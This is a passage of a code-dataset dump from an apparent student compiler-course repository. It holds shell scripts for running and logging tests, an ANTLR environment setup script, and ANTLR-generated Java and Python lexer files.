\n\n\n" }, { "alpha_fraction": 0.6461538672447205, "alphanum_fraction": 0.6461538672447205, "avg_line_length": 31.5, "blob_id": "513a401a825a3b4a0933706fc902e7a6bb14d7cc", "content_id": "95f0549360c0db606964088c8c989e352e4a4920", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 65, "license_type": "no_license", "max_line_length": 45, "num_lines": 2, "path": "/Assignments/assignment3/src/run_test.sh", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "python ./run.py test CheckSuite > ./check.log\n./log.sh > ./log.m\n" }, { "alpha_fraction": 0.30581867694854736, "alphanum_fraction": 0.311231404542923, "avg_line_length": 27.461538314819336, "blob_id": "ad95e804b18dd0bd8e4775de7b2a032889092bde", "content_id": "0c4e0b490c6013e9dba7cf5a3d92adaa0d46a924", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 739, "license_type": "no_license", "max_line_length": 51, "num_lines": 26, "path": "/Assignments/assignment2/src1.0/log.sh", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "#!/bin/bash\nTEST_DIR=\"./test/testcases\"\nSOL_DIR=\"./test/solutions\"\n\nif [ $# -eq 1 ]\n\tthen \n\t\techo -e \"\\n===========================\"\n echo -e \"Testcase#\"$1 \n echo \"***********TEST*******\"\n cat $TEST_DIR/$1.txt\n echo\n echo \"************SOL**********\"\n cat $SOL_DIR/$1.txt\n echo -e \"\\n===========================\"\n\telse\n\t\tfor file in $TEST_DIR/*; do\n echo -e \"\\n===========================\"\n echo -e \"Testcase#\"${file##*/} \n echo \"***********TEST*******\"\n cat $TEST_DIR/${file##*/}\n echo\n echo \"************SOL**********\"\n cat $SOL_DIR/${file##*/}\n echo -e \"\\n===========================\"\n done\nfi" }, { "alpha_fraction": 0.7478991746902466, "alphanum_fraction": 0.7836134433746338, "avg_line_length": 78.33333587646484, "blob_id": "37b4d02d19bc1577e598364aa79fbb047125e1c2", "content_id": "10f7d87d59c84b83c184a6b0a20fa6c80b1849a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 476, "license_type": "no_license", "max_line_length": 130, "num_lines": 6, "path": "/setup.sh", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "#!/bin/zsh\nexport ANTLR_JAR=\"/home/nguyendat/Documents/projects/PPL/antlr-4.8-complete.jar\"\nexport CLASSPATH=\".:/home/nguyendat/Documents/projects/PPL/antlr-4.8-complete.jar:$CLASSPATH\"\nalias antlr4='java -Xmx500M -cp \"/home/nguyendat/Documents/projects/PPL/antlr-4.8-complete.jar:$CLASSPATH\" org.antlr.v4.Tool'\nalias grun='java -Xmx500M -cp \"/home/nguyendat/Documents/projects/PPL/antlr-4.8-complete.jar:$CLASSPATH\" org.antlr.v4.gui.TestRig'\necho \"Set environment variables\"\n" }, { "alpha_fraction": 0.3809041380882263, "alphanum_fraction": 0.6242877244949341, "avg_line_length": 43.370784759521484, "blob_id": "da1f01277fdb580c571c2130cac7bb18b6f9d3fd", "content_id": "0ada41aae0ee9123871caeef4f830c17e5b7f753", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 7897, "license_type": "no_license", "max_line_length": 97, "num_lines": 178, "path": "/LexicalAnalysis/Question3Lexer.java", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "// Generated from Question3.g4 by ANTLR 4.8\nimport org.antlr.v4.runtime.Lexer;\nimport org.antlr.v4.runtime.CharStream;\nimport org.antlr.v4.runtime.Token;\nimport org.antlr.v4.runtime.TokenStream;\nimport org.antlr.v4.runtime.*;\nimport org.antlr.v4.runtime.atn.*;\nimport org.antlr.v4.runtime.dfa.DFA;\nimport org.antlr.v4.runtime.misc.*;\n\n@SuppressWarnings({\"all\", \"warnings\", \"unchecked\", \"unused\", \"cast\"})\npublic class Question3Lexer extends Lexer {\n\tstatic { RuntimeMetaData.checkVersion(\"4.8\", RuntimeMetaData.VERSION); }\n\n\tprotected static final DFA[] _decisionToDFA;\n\tprotected static final PredictionContextCache _sharedContextCache =\n\t\tnew PredictionContextCache();\n\tpublic static final int\n\t\tT__0=1, Real_number=2, Integer_number=3, SEMI=4, COMMA=5, HEXADECIMAL=6, \n\t\tDECIMAL=7, OCTAL=8, STRING=9, WS=10;\n\tpublic static String[] channelNames = {\n\t\t\"DEFAULT_TOKEN_CHANNEL\", \"HIDDEN\"\n\t};\n\n\tpublic static String[] modeNames = {\n\t\t\"DEFAULT_MODE\"\n\t};\n\n\tprivate static String[] makeRuleNames() {\n\t\treturn new String[] {\n\t\t\t\"T__0\", \"Real_number\", \"Integer_number\", \"LOWERCASE_LETTER\", \"UPPERCASE_LETTER\", \n\t\t\t\"DIGIT\", \"SIGN\", \"SPACE\", \"SCIENTIFIC\", \"DECIMAL_POINT\", \"FLOATING_POINT_NUM\", \n\t\t\t\"SING_QUOTE\", \"DOUBLE_QUOTE\", \"DOUBLE_QUOTE_IN_QUOTE\", \"HEXADECIMALDIGIT\", \n\t\t\t\"OCTALDIGIT\", \"COLON\", \"SEMI\", \"DOT\", \"COMMA\", \"HEXADECIMAL\", \"DECIMAL\", \n\t\t\t\"OCTAL\", \"LETTER\", \"ID\", \"SING_QUOTE_IN_STRING\", \"STRING_CHAR\", \"STRING\", \n\t\t\t\"WS\"\n\t\t};\n\t}\n\tpublic static final String[] ruleNames = makeRuleNames();\n\n\tprivate static String[] makeLiteralNames() {\n\t\treturn new String[] {\n\t\t\tnull, \"'''\", null, null, \"';'\", \"','\"\n\t\t};\n\t}\n\tprivate static final String[] _LITERAL_NAMES = makeLiteralNames();\n\tprivate static String[] makeSymbolicNames() {\n\t\treturn new String[] {\n\t\t\tnull, null, \"Real_number\", \"Integer_number\", \"SEMI\", \"COMMA\", \"HEXADECIMAL\", \n\t\t\t\"DECIMAL\", \"OCTAL\", \"STRING\", \"WS\"\n\t\t};\n\t}\n\tprivate static final String[] _SYMBOLIC_NAMES = makeSymbolicNames();\n\tpublic static final Vocabulary VOCABULARY = new VocabularyImpl(_LITERAL_NAMES, _SYMBOLIC_NAMES);\n\n\t/**\n\t * @deprecated Use {@link #VOCABULARY} instead.\n\t */\n\t@Deprecated\n\tpublic static final String[] tokenNames;\n\tstatic {\n\t\ttokenNames = new String[_SYMBOLIC_NAMES.length];\n\t\tfor (int i = 0; i < tokenNames.length; i++) {\n\t\t\ttokenNames[i] = VOCABULARY.getLiteralName(i);\n\t\t\tif (tokenNames[i] == null) {\n\t\t\t\ttokenNames[i] = VOCABULARY.getSymbolicName(i);\n\t\t\t}\n\n\t\t\tif (tokenNames[i] == null) {\n\t\t\t\ttokenNames[i] = \"<INVALID>\";\n\t\t\t}\n\t\t}\n\t}\n\n\t@Override\n\t@Deprecated\n\tpublic String[] getTokenNames() {\n\t\treturn tokenNames;\n\t}\n\n\t@Override\n\n\tpublic Vocabulary getVocabulary() {\n\t\treturn VOCABULARY;\n\t}\n\n\n\tpublic Question3Lexer(CharStream input) {\n\t\tsuper(input);\n\t\t_interp = new LexerATNSimulator(this,_ATN,_decisionToDFA,_sharedContextCache);\n\t}\n\n\t@Override\n\tpublic String getGrammarFileName() { return \"Question3.g4\"; }\n\n\t@Override\n\tpublic String[] getRuleNames() { return ruleNames; }\n\n\t@Override\n\tpublic String getSerializedATN() { return _serializedATN; }\n\n\t@Override\n\tpublic String[] getChannelNames() { return channelNames; }\n\n\t@Override\n\tpublic String[] getModeNames() { return modeNames; }\n\n\t@Override\n\tpublic ATN getATN() { return _ATN; }\n\n\tpublic static final String _serializedATN =\n\t\t\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\2\\f\\u00ba\\b\\1\\4\\2\\t\"+\n\t\t\"\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\\t\\7\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\"+\n\t\t\"\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\\4\\16\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\"+\n\t\t\"\\4\\23\\t\\23\\4\\24\\t\\24\\4\\25\\t\\25\\4\\26\\t\\26\\4\\27\\t\\27\\4\\30\\t\\30\\4\\31\\t\\31\"+\n\t\t\"\\4\\32\\t\\32\\4\\33\\t\\33\\4\\34\\t\\34\\4\\35\\t\\35\\4\\36\\t\\36\\3\\2\\3\\2\\3\\3\\3\\3\\3\\3\"+\n\t\t\"\\3\\4\\3\\4\\3\\4\\3\\4\\5\\4G\\n\\4\\3\\5\\3\\5\\3\\6\\3\\6\\3\\7\\3\\7\\3\\b\\5\\bP\\n\\b\\3\\t\\3\\t\"+\n\t\t\"\\3\\n\\3\\n\\3\\n\\6\\nW\\n\\n\\r\\n\\16\\nX\\3\\13\\3\\13\\7\\13]\\n\\13\\f\\13\\16\\13`\\13\\13\"+\n\t\t\"\\3\\f\\6\\fc\\n\\f\\r\\f\\16\\fd\\3\\f\\3\\f\\5\\fi\\n\\f\\3\\f\\5\\fl\\n\\f\\3\\r\\3\\r\\3\\16\\3\\16\"+\n\t\t\"\\3\\17\\3\\17\\3\\20\\3\\20\\3\\21\\3\\21\\3\\22\\3\\22\\3\\23\\3\\23\\3\\24\\3\\24\\3\\25\\3\\25\"+\n\t\t\"\\3\\26\\3\\26\\3\\26\\3\\26\\5\\26\\u0084\\n\\26\\3\\26\\6\\26\\u0087\\n\\26\\r\\26\\16\\26\\u0088\"+\n\t\t\"\\3\\27\\6\\27\\u008c\\n\\27\\r\\27\\16\\27\\u008d\\3\\30\\3\\30\\3\\30\\3\\30\\5\\30\\u0094\"+\n\t\t\"\\n\\30\\3\\30\\6\\30\\u0097\\n\\30\\r\\30\\16\\30\\u0098\\3\\31\\3\\31\\5\\31\\u009d\\n\\31\"+\n\t\t\"\\3\\32\\3\\32\\3\\32\\7\\32\\u00a2\\n\\32\\f\\32\\16\\32\\u00a5\\13\\32\\3\\33\\3\\33\\3\\33\"+\n\t\t\"\\3\\34\\3\\34\\5\\34\\u00ac\\n\\34\\3\\35\\7\\35\\u00af\\n\\35\\f\\35\\16\\35\\u00b2\\13\\35\"+\n\t\t\"\\3\\36\\6\\36\\u00b5\\n\\36\\r\\36\\16\\36\\u00b6\\3\\36\\3\\36\\2\\2\\37\\3\\3\\5\\4\\7\\5\\t\"+\n\t\t\"\\2\\13\\2\\r\\2\\17\\2\\21\\2\\23\\2\\25\\2\\27\\2\\31\\2\\33\\2\\35\\2\\37\\2!\\2#\\2%\\6\\'\\2\"+\n\t\t\")\\7+\\b-\\t/\\n\\61\\2\\63\\2\\65\\2\\67\\29\\13;\\f\\3\\2\\20\\3\\2c|\\3\\2C\\\\\\3\\2\\62;\\4\"+\n\t\t\"\\2--//\\3\\2\\\"\\\"\\3\\2gg\\3\\2\\60\\60\\3\\2))\\3\\2$$\\4\\2$$))\\5\\2\\62;CHch\\3\\2\\62\"+\n\t\t\"9\\5\\2\\n\\f\\16\\17))\\5\\2\\13\\f\\17\\17\\\"\\\"\\2\\u00b9\\2\\3\\3\\2\\2\\2\\2\\5\\3\\2\\2\\2\\2\"+\n\t\t\"\\7\\3\\2\\2\\2\\2%\\3\\2\\2\\2\\2)\\3\\2\\2\\2\\2+\\3\\2\\2\\2\\2-\\3\\2\\2\\2\\2/\\3\\2\\2\\2\\29\\3\"+\n\t\t\"\\2\\2\\2\\2;\\3\\2\\2\\2\\3=\\3\\2\\2\\2\\5?\\3\\2\\2\\2\\7B\\3\\2\\2\\2\\tH\\3\\2\\2\\2\\13J\\3\\2\"+\n\t\t\"\\2\\2\\rL\\3\\2\\2\\2\\17O\\3\\2\\2\\2\\21Q\\3\\2\\2\\2\\23S\\3\\2\\2\\2\\25Z\\3\\2\\2\\2\\27b\\3\"+\n\t\t\"\\2\\2\\2\\31m\\3\\2\\2\\2\\33o\\3\\2\\2\\2\\35q\\3\\2\\2\\2\\37s\\3\\2\\2\\2!u\\3\\2\\2\\2#w\\3\\2\"+\n\t\t\"\\2\\2%y\\3\\2\\2\\2\\'{\\3\\2\\2\\2)}\\3\\2\\2\\2+\\u0083\\3\\2\\2\\2-\\u008b\\3\\2\\2\\2/\\u0093\"+\n\t\t\"\\3\\2\\2\\2\\61\\u009c\\3\\2\\2\\2\\63\\u009e\\3\\2\\2\\2\\65\\u00a6\\3\\2\\2\\2\\67\\u00ab\\3\"+\n\t\t\"\\2\\2\\29\\u00b0\\3\\2\\2\\2;\\u00b4\\3\\2\\2\\2=>\\7)\\2\\2>\\4\\3\\2\\2\\2?@\\5\\17\\b\\2@A\"+\n\t\t\"\\5\\27\\f\\2A\\6\\3\\2\\2\\2BF\\5\\17\\b\\2CG\\5-\\27\\2DG\\5+\\26\\2EG\\5/\\30\\2FC\\3\\2\\2\"+\n\t\t\"\\2FD\\3\\2\\2\\2FE\\3\\2\\2\\2G\\b\\3\\2\\2\\2HI\\t\\2\\2\\2I\\n\\3\\2\\2\\2JK\\t\\3\\2\\2K\\f\\3\"+\n\t\t\"\\2\\2\\2LM\\t\\4\\2\\2M\\16\\3\\2\\2\\2NP\\t\\5\\2\\2ON\\3\\2\\2\\2OP\\3\\2\\2\\2P\\20\\3\\2\\2\\2\"+\n\t\t\"QR\\t\\6\\2\\2R\\22\\3\\2\\2\\2ST\\t\\7\\2\\2TV\\5\\17\\b\\2UW\\5\\r\\7\\2VU\\3\\2\\2\\2WX\\3\\2\"+\n\t\t\"\\2\\2XV\\3\\2\\2\\2XY\\3\\2\\2\\2Y\\24\\3\\2\\2\\2Z^\\t\\b\\2\\2[]\\5\\r\\7\\2\\\\[\\3\\2\\2\\2]`\"+\n\t\t\"\\3\\2\\2\\2^\\\\\\3\\2\\2\\2^_\\3\\2\\2\\2_\\26\\3\\2\\2\\2`^\\3\\2\\2\\2ac\\5\\r\\7\\2ba\\3\\2\\2\"+\n\t\t\"\\2cd\\3\\2\\2\\2db\\3\\2\\2\\2de\\3\\2\\2\\2ek\\3\\2\\2\\2fh\\5\\25\\13\\2gi\\5\\23\\n\\2hg\\3\"+\n\t\t\"\\2\\2\\2hi\\3\\2\\2\\2il\\3\\2\\2\\2jl\\5\\23\\n\\2kf\\3\\2\\2\\2kj\\3\\2\\2\\2l\\30\\3\\2\\2\\2\"+\n\t\t\"mn\\t\\t\\2\\2n\\32\\3\\2\\2\\2op\\t\\n\\2\\2p\\34\\3\\2\\2\\2qr\\t\\13\\2\\2r\\36\\3\\2\\2\\2st\"+\n\t\t\"\\t\\f\\2\\2t \\3\\2\\2\\2uv\\t\\r\\2\\2v\\\"\\3\\2\\2\\2wx\\7<\\2\\2x$\\3\\2\\2\\2yz\\7=\\2\\2z&\"+\n\t\t\"\\3\\2\\2\\2{|\\7\\60\\2\\2|(\\3\\2\\2\\2}~\\7.\\2\\2~*\\3\\2\\2\\2\\177\\u0080\\7\\62\\2\\2\\u0080\"+\n\t\t\"\\u0084\\7z\\2\\2\\u0081\\u0082\\7\\62\\2\\2\\u0082\\u0084\\7Z\\2\\2\\u0083\\177\\3\\2\\2\"+\n\t\t\"\\2\\u0083\\u0081\\3\\2\\2\\2\\u0084\\u0086\\3\\2\\2\\2\\u0085\\u0087\\5\\37\\20\\2\\u0086\"+\n\t\t\"\\u0085\\3\\2\\2\\2\\u0087\\u0088\\3\\2\\2\\2\\u0088\\u0086\\3\\2\\2\\2\\u0088\\u0089\\3\\2\"+\n\t\t\"\\2\\2\\u0089,\\3\\2\\2\\2\\u008a\\u008c\\5\\r\\7\\2\\u008b\\u008a\\3\\2\\2\\2\\u008c\\u008d\"+\n\t\t\"\\3\\2\\2\\2\\u008d\\u008b\\3\\2\\2\\2\\u008d\\u008e\\3\\2\\2\\2\\u008e.\\3\\2\\2\\2\\u008f\"+\n\t\t\"\\u0090\\7\\62\\2\\2\\u0090\\u0094\\7q\\2\\2\\u0091\\u0092\\7\\62\\2\\2\\u0092\\u0094\\7\"+\n\t\t\"Q\\2\\2\\u0093\\u008f\\3\\2\\2\\2\\u0093\\u0091\\3\\2\\2\\2\\u0094\\u0096\\3\\2\\2\\2\\u0095\"+\n\t\t\"\\u0097\\5!\\21\\2\\u0096\\u0095\\3\\2\\2\\2\\u0097\\u0098\\3\\2\\2\\2\\u0098\\u0096\\3\\2\"+\n\t\t\"\\2\\2\\u0098\\u0099\\3\\2\\2\\2\\u0099\\60\\3\\2\\2\\2\\u009a\\u009d\\5\\t\\5\\2\\u009b\\u009d\"+\n\t\t\"\\5\\13\\6\\2\\u009c\\u009a\\3\\2\\2\\2\\u009c\\u009b\\3\\2\\2\\2\\u009d\\62\\3\\2\\2\\2\\u009e\"+\n\t\t\"\\u00a3\\5\\t\\5\\2\\u009f\\u00a2\\5\\t\\5\\2\\u00a0\\u00a2\\5\\r\\7\\2\\u00a1\\u009f\\3\\2\"+\n\t\t\"\\2\\2\\u00a1\\u00a0\\3\\2\\2\\2\\u00a2\\u00a5\\3\\2\\2\\2\\u00a3\\u00a1\\3\\2\\2\\2\\u00a3\"+\n\t\t\"\\u00a4\\3\\2\\2\\2\\u00a4\\64\\3\\2\\2\\2\\u00a5\\u00a3\\3\\2\\2\\2\\u00a6\\u00a7\\5\\31\\r\"+\n\t\t\"\\2\\u00a7\\u00a8\\5\\31\\r\\2\\u00a8\\66\\3\\2\\2\\2\\u00a9\\u00ac\\5\\65\\33\\2\\u00aa\\u00ac\"+\n\t\t\"\\n\\16\\2\\2\\u00ab\\u00a9\\3\\2\\2\\2\\u00ab\\u00aa\\3\\2\\2\\2\\u00ac8\\3\\2\\2\\2\\u00ad\"+\n\t\t\"\\u00af\\5\\67\\34\\2\\u00ae\\u00ad\\3\\2\\2\\2\\u00af\\u00b2\\3\\2\\2\\2\\u00b0\\u00ae\\3\"+\n\t\t\"\\2\\2\\2\\u00b0\\u00b1\\3\\2\\2\\2\\u00b1:\\3\\2\\2\\2\\u00b2\\u00b0\\3\\2\\2\\2\\u00b3\\u00b5\"+\n\t\t\"\\t\\17\\2\\2\\u00b4\\u00b3\\3\\2\\2\\2\\u00b5\\u00b6\\3\\2\\2\\2\\u00b6\\u00b4\\3\\2\\2\\2\"+\n\t\t\"\\u00b6\\u00b7\\3\\2\\2\\2\\u00b7\\u00b8\\3\\2\\2\\2\\u00b8\\u00b9\\b\\36\\2\\2\\u00b9<\\3\"+\n\t\t\"\\2\\2\\2\\25\\2FOX^dhk\\u0083\\u0088\\u008d\\u0093\\u0098\\u009c\\u00a1\\u00a3\\u00ab\"+\n\t\t\"\\u00b0\\u00b6\\3\\b\\2\\2\";\n\tpublic static final ATN _ATN =\n\t\tnew ATNDeserializer().deserialize(_serializedATN.toCharArray());\n\tstatic {\n\t\t_decisionToDFA = new DFA[_ATN.getNumberOfDecisions()];\n\t\tfor (int i = 0; i < _ATN.getNumberOfDecisions(); i++) {\n\t\t\t_decisionToDFA[i] = new DFA(_ATN.getDecisionState(i), i);\n\t\t}\n\t}\n}" }, { "alpha_fraction": 0.2968606650829315, "alphanum_fraction": 0.5580198764801025, "avg_line_length": 57.106727600097656, "blob_id": "72d1fd4ec8065dc1f3c33be0db981a4b5dde696a", "content_id": "327bff8d0cf2eb255b159852d80403b8828bc0be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 25069, "license_type": "no_license", "max_line_length": 103, "num_lines": 431, "path": "/SyntaxAnalysis/target/main/bkit/parser/BKITLexer.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from main/bkit/parser/BKIT.g4 by ANTLR 4.8\nfrom antlr4 import *\nfrom io import StringIO\nfrom typing.io import TextIO\nimport sys\n\n\nfrom lexererr import *\n\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\2D\")\n buf.write(\"\\u0229\\b\\1\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\")\n buf.write(\"\\t\\7\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\")\n buf.write(\"\\4\\16\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\\4\\23\")\n buf.write(\"\\t\\23\\4\\24\\t\\24\\4\\25\\t\\25\\4\\26\\t\\26\\4\\27\\t\\27\\4\\30\\t\\30\")\n buf.write(\"\\4\\31\\t\\31\\4\\32\\t\\32\\4\\33\\t\\33\\4\\34\\t\\34\\4\\35\\t\\35\\4\\36\")\n buf.write(\"\\t\\36\\4\\37\\t\\37\\4 \\t \\4!\\t!\\4\\\"\\t\\\"\\4#\\t#\\4$\\t$\\4%\\t%\")\n buf.write(\"\\4&\\t&\\4\\'\\t\\'\\4(\\t(\\4)\\t)\\4*\\t*\\4+\\t+\\4,\\t,\\4-\\t-\\4.\")\n buf.write(\"\\t.\\4/\\t/\\4\\60\\t\\60\\4\\61\\t\\61\\4\\62\\t\\62\\4\\63\\t\\63\\4\\64\")\n buf.write(\"\\t\\64\\4\\65\\t\\65\\4\\66\\t\\66\\4\\67\\t\\67\\48\\t8\\49\\t9\\4:\\t:\")\n buf.write(\"\\4;\\t;\\4<\\t<\\4=\\t=\\4>\\t>\\4?\\t?\\4@\\t@\\4A\\tA\\4B\\tB\\4C\\t\")\n buf.write(\"C\\4D\\tD\\4E\\tE\\4F\\tF\\4G\\tG\\4H\\tH\\4I\\tI\\4J\\tJ\\4K\\tK\\4L\\t\")\n buf.write(\"L\\4M\\tM\\4N\\tN\\4O\\tO\\4P\\tP\\4Q\\tQ\\4R\\tR\\4S\\tS\\4T\\tT\\3\\2\")\n buf.write(\"\\3\\2\\3\\2\\3\\3\\3\\3\\3\\3\\7\\3\\u00b0\\n\\3\\f\\3\\16\\3\\u00b3\\13\\3\")\n buf.write(\"\\3\\4\\3\\4\\7\\4\\u00b7\\n\\4\\f\\4\\16\\4\\u00ba\\13\\4\\3\\4\\3\\4\\3\\5\")\n buf.write(\"\\3\\5\\7\\5\\u00c0\\n\\5\\f\\5\\16\\5\\u00c3\\13\\5\\3\\5\\5\\5\\u00c6\\n\")\n buf.write(\"\\5\\3\\5\\3\\5\\3\\6\\3\\6\\3\\6\\3\\6\\7\\6\\u00ce\\n\\6\\f\\6\\16\\6\\u00d1\")\n buf.write(\"\\13\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\7\\3\\7\\3\\7\\3\\7\\7\\7\\u00dc\\n\")\n buf.write(\"\\7\\f\\7\\16\\7\\u00df\\13\\7\\3\\7\\3\\7\\3\\b\\3\\b\\3\\t\\6\\t\\u00e6\\n\")\n buf.write(\"\\t\\r\\t\\16\\t\\u00e7\\3\\t\\3\\t\\3\\n\\3\\n\\3\\13\\3\\13\\3\\f\\3\\f\\3\")\n buf.write(\"\\r\\3\\r\\5\\r\\u00f4\\n\\r\\3\\16\\5\\16\\u00f7\\n\\16\\3\\17\\3\\17\\3\")\n buf.write(\"\\17\\6\\17\\u00fc\\n\\17\\r\\17\\16\\17\\u00fd\\3\\20\\3\\20\\7\\20\\u0102\")\n buf.write(\"\\n\\20\\f\\20\\16\\20\\u0105\\13\\20\\3\\21\\6\\21\\u0108\\n\\21\\r\\21\")\n buf.write(\"\\16\\21\\u0109\\3\\21\\3\\21\\5\\21\\u010e\\n\\21\\3\\21\\5\\21\\u0111\")\n buf.write(\"\\n\\21\\3\\22\\3\\22\\3\\22\\3\\23\\3\\23\\3\\23\\3\\24\\3\\24\\3\\24\\3\\25\")\n buf.write(\"\\3\\25\\3\\25\\5\\25\\u011f\\n\\25\\3\\26\\3\\26\\3\\27\\3\\27\\3\\30\\3\")\n buf.write(\"\\30\\3\\30\\3\\30\\5\\30\\u0129\\n\\30\\3\\30\\6\\30\\u012c\\n\\30\\r\\30\")\n buf.write(\"\\16\\30\\u012d\\3\\31\\6\\31\\u0131\\n\\31\\r\\31\\16\\31\\u0132\\3\\32\")\n buf.write(\"\\3\\32\\3\\32\\3\\32\\5\\32\\u0139\\n\\32\\3\\32\\6\\32\\u013c\\n\\32\\r\")\n buf.write(\"\\32\\16\\32\\u013d\\3\\33\\3\\33\\3\\33\\5\\33\\u0143\\n\\33\\3\\34\\3\")\n buf.write(\"\\34\\3\\35\\3\\35\\5\\35\\u0149\\n\\35\\3\\36\\3\\36\\7\\36\\u014d\\n\\36\")\n buf.write(\"\\f\\36\\16\\36\\u0150\\13\\36\\3\\36\\3\\36\\3\\36\\3\\37\\3\\37\\3\\37\")\n buf.write(\"\\3\\37\\3\\37\\3 \\3 \\3 \\3 \\3 \\3 \\3!\\3!\\3!\\3!\\3!\\3!\\3!\\3!\\3\")\n buf.write(\"!\\3\\\"\\3\\\"\\3\\\"\\3#\\3#\\3#\\3#\\3#\\3$\\3$\\3$\\3$\\3$\\3$\\3$\\3%\\3\")\n buf.write(\"%\\3%\\3%\\3%\\3%\\3%\\3&\\3&\\3&\\3&\\3&\\3&\\3\\'\\3\\'\\3\\'\\3\\'\\3\\'\")\n buf.write(\"\\3\\'\\3\\'\\3(\\3(\\3(\\3(\\3(\\3(\\3(\\3(\\3(\\3)\\3)\\3)\\3)\\3*\\3*\")\n buf.write(\"\\3*\\3*\\3*\\3*\\3*\\3*\\3*\\3+\\3+\\3+\\3,\\3,\\3,\\3,\\3,\\3,\\3,\\3\")\n buf.write(\",\\3,\\3,\\3-\\3-\\3-\\3-\\3-\\3-\\3-\\3.\\3.\\3.\\3.\\3.\\3/\\3/\\3/\\3\")\n buf.write(\"/\\3\\60\\3\\60\\3\\60\\3\\60\\3\\60\\3\\60\\3\\61\\3\\61\\3\\61\\3\\61\\3\")\n buf.write(\"\\61\\3\\62\\3\\62\\3\\62\\3\\62\\3\\62\\3\\62\\3\\63\\3\\63\\3\\63\\3\\63\")\n buf.write(\"\\3\\63\\3\\63\\3\\64\\3\\64\\3\\65\\3\\65\\3\\65\\3\\66\\3\\66\\3\\67\\3\\67\")\n buf.write(\"\\3\\67\\38\\38\\39\\39\\39\\3:\\3:\\3;\\3;\\3;\\3<\\3<\\3=\\3=\\3>\\3>\")\n buf.write(\"\\3>\\3?\\3?\\3?\\3@\\3@\\3@\\3A\\3A\\3A\\3B\\3B\\3C\\3C\\3D\\3D\\3D\\3\")\n buf.write(\"E\\3E\\3E\\3F\\3F\\3F\\3F\\3G\\3G\\3G\\3H\\3H\\3H\\3I\\3I\\3I\\3I\\3J\\3\")\n buf.write(\"J\\3J\\3J\\3K\\3K\\3L\\3L\\3M\\3M\\3N\\3N\\3O\\3O\\3P\\3P\\3Q\\3Q\\3R\\3\")\n buf.write(\"R\\3S\\3S\\3T\\3T\\4\\u00cf\\u00dd\\2U\\3\\3\\5\\4\\7\\5\\t\\6\\13\\7\\r\")\n buf.write(\"\\b\\17\\t\\21\\n\\23\\2\\25\\2\\27\\2\\31\\2\\33\\2\\35\\2\\37\\2!\\2#\\2\")\n buf.write(\"%\\2\\'\\2)\\2+\\2-\\2/\\2\\61\\2\\63\\2\\65\\13\\67\\f9\\r;\\16=\\17?\\20\")\n buf.write(\"A\\21C\\22E\\23G\\24I\\25K\\26M\\27O\\30Q\\31S\\32U\\33W\\34Y\\35[\")\n buf.write(\"\\36]\\37_ a!c\\\"e#g$i%k&m\\'o(q)s*u+w,y-{.}/\\177\\60\\u0081\")\n buf.write(\"\\61\\u0083\\62\\u0085\\63\\u0087\\64\\u0089\\65\\u008b\\66\\u008d\")\n buf.write(\"\\67\\u008f8\\u00919\\u0093:\\u0095;\\u0097<\\u0099=\\u009b>\\u009d\")\n buf.write(\"?\\u009f@\\u00a1A\\u00a3B\\u00a5C\\u00a7D\\3\\2\\17\\4\\3\\n\\f\\16\")\n buf.write(\"\\17\\4\\2\\60\\60AA\\5\\2\\13\\f\\16\\17\\\"\\\"\\3\\2c|\\3\\2C\\\\\\3\\2\\62\")\n buf.write(\";\\4\\2--//\\4\\2GGgg\\3\\2\\60\\60\\t\\2))^^ddhhppttvv\\7\\2\\n\\f\")\n buf.write(\"\\16\\17$$))^^\\5\\2\\62;CHch\\3\\2\\629\\2\\u0230\\2\\3\\3\\2\\2\\2\\2\")\n buf.write(\"\\5\\3\\2\\2\\2\\2\\7\\3\\2\\2\\2\\2\\t\\3\\2\\2\\2\\2\\13\\3\\2\\2\\2\\2\\r\\3\")\n buf.write(\"\\2\\2\\2\\2\\17\\3\\2\\2\\2\\2\\21\\3\\2\\2\\2\\2\\65\\3\\2\\2\\2\\2\\67\\3\\2\")\n buf.write(\"\\2\\2\\29\\3\\2\\2\\2\\2;\\3\\2\\2\\2\\2=\\3\\2\\2\\2\\2?\\3\\2\\2\\2\\2A\\3\")\n buf.write(\"\\2\\2\\2\\2C\\3\\2\\2\\2\\2E\\3\\2\\2\\2\\2G\\3\\2\\2\\2\\2I\\3\\2\\2\\2\\2K\")\n buf.write(\"\\3\\2\\2\\2\\2M\\3\\2\\2\\2\\2O\\3\\2\\2\\2\\2Q\\3\\2\\2\\2\\2S\\3\\2\\2\\2\\2\")\n buf.write(\"U\\3\\2\\2\\2\\2W\\3\\2\\2\\2\\2Y\\3\\2\\2\\2\\2[\\3\\2\\2\\2\\2]\\3\\2\\2\\2\")\n buf.write(\"\\2_\\3\\2\\2\\2\\2a\\3\\2\\2\\2\\2c\\3\\2\\2\\2\\2e\\3\\2\\2\\2\\2g\\3\\2\\2\")\n 